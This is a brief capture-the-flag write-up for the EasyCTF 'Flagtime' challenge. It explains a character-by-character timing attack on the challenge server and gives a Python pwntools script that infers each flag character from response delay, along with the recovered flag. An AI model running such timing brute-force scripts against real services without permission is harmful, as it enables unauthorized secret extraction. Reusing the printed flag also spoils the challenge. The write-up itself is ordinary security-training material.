Tags: timing easyctf attack
Rating:
Original at [https://ctfshellclub.github.io/2018/02/21/easyctf-flagtime/](https://ctfshellclub.github.io/2018/02/21/easyctf-flagtime/)
# EASYCTF - Flagtime
> This problem is so easy, it can be solved in a matter of seconds. Connect to c1.easyctf.com:12482.
This was a simple timing attack on the service `c1.easyctf.com:12482`. However extracting the 26 characters took a really long time... The first delay was 1 second and then was incremented by 1 for every correct characters, when you're trying to get the last characters it took around 25 seconds a try :(
```python
#!/usr/bin/python
# -*- coding: utf-8 -*-
from pwn import *
import time
flag = "easyctf{ez_t1m1ng_4ttack!}"
max_time = 27
while True:
for c in "!?}_15scktemng4afbsydh5ij37lopqruvwx02689z-@{":
p = remote("c1.easyctf.com", 12482)
p.recv()
before = time.time()
p.sendline(flag+c)
p.recv()
p.close()
after = time.time()
if after-before > max_time:
max_time = max_time+1
print max_time
flag = flag+c
break
print flag
```
